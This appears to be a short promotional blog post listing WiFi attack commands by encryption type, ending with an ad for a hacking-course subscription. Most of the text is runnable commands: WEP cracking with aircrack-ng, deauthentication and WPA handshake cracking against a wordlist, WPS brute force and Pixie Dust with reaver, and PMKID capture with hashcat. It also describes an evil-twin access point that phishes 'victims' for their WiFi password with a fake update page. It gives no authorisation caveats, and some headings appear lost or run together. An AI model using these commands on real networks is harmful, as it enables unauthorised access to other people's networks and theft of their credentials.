WiFi is the most exploited network type. Here's every method used by penetration testers, categorized by encryption type.
# WEP is broken — cracked in minutes
airodump-ng wlan0mon
aireplay-ng -3 -b BSSID wlan0mon # Generate traffic
aircrack-ng capture.cap # Crack with 20,000+ IVsSuccess rate: 100% — WEP can always be cracked.
airodump-ng -c CH --bssid BSSID -w capture wlan0mon
aireplay-ng --deauth 10 -a BSSID wlan0mon
aircrack-ng -w rockyou.txt capture.capSuccess rate: 60-80% for common passwords.
wash -i wlan0mon # Find WPS-enabled networks
reaver -i wlan0mon -b BSSID -vv # Brute force 8-digit PIN
# Or use Pixie Dust attack:
reaver -i wlan0mon -b BSSID -K 1 # Seconds instead of hourshcxdumptool -o output.pcapng -i wlan0mon --filterlist_ap=BSSID --filtermode=2
hcxpcapngtool output.pcapng -o hash.hc22000
hashcat -m 22000 hash.hc22000 rockyou.txtThis is the newest method — no need to wait for a client to connect!
Create a fake access point with the same name. Victims connect to your AP, and you serve a fake "router update" page that asks for the WiFi password.
Subscribe to ONLY4YOU and get hands-on access to 40+ premium courses — Ethical Hacking, Kali Linux, Metasploit, Network Hacking, Bug Bounty & more!